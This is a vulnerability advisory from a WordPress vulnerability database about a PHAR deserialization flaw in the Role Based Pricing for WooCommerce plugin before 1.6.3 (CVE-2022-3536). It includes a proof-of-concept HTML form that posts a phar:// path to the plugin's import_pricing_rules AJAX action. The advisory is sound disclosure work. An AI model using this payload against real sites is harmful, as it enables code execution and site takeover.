Lucene search
WpvulndbWPEX-ID:6AF63AAB-B7A6-4EF6-8604-4B4B99467A34HistoryOct 17, 2022 - 12:00 a.m.
Role Based Pricing for WooCommerce < 1.6.3 - Subscriber+ PHAR Deserialization
2022-10-1700:00:00
wpvulndb
63
woocommerce
subscriber
phar deserialization
malicious file
gadget chain
html code
exploit
security vulnerability
0.001 Low
EPSS
Percentile
34.5%
The plugin does not have authorisation and proper CSRF checks, as well as does not validate path given via user input, allowing any authenticated users like subscriber to perform PHAR deserialization attacks when they can upload a file, and a suitable gadget chain is present on the blog
As a subscriber, upload a malicious file being a PHAR with a gadget chain, open the HTML code below while being logged in as a subscriber and submit it
<form action="https://example.com/wp-admin/admin-ajax.php?action=import_pricing_rules" method="POST" enctype="multipart/form-data">
<input type="text" name="file_path" value="phar://path-to-malicious-phar">
<input type="text" name="afcsp_nonce" value="xxxxx"><!-- since 1.6.2 -->
<input type="submit" name="submit" value="submit">
</form>Related
nvd
nvd
CVE-2022-3536
2022-11-07 10:15:12
cvelist
cvelist
patchstack
patchstack
wpvulndb
wpvulndb
cve
cve
CVE-2022-3536
2022-11-07 10:15:12
prion
prion
Cross site request forgery (csrf)
2022-11-07 10:15:00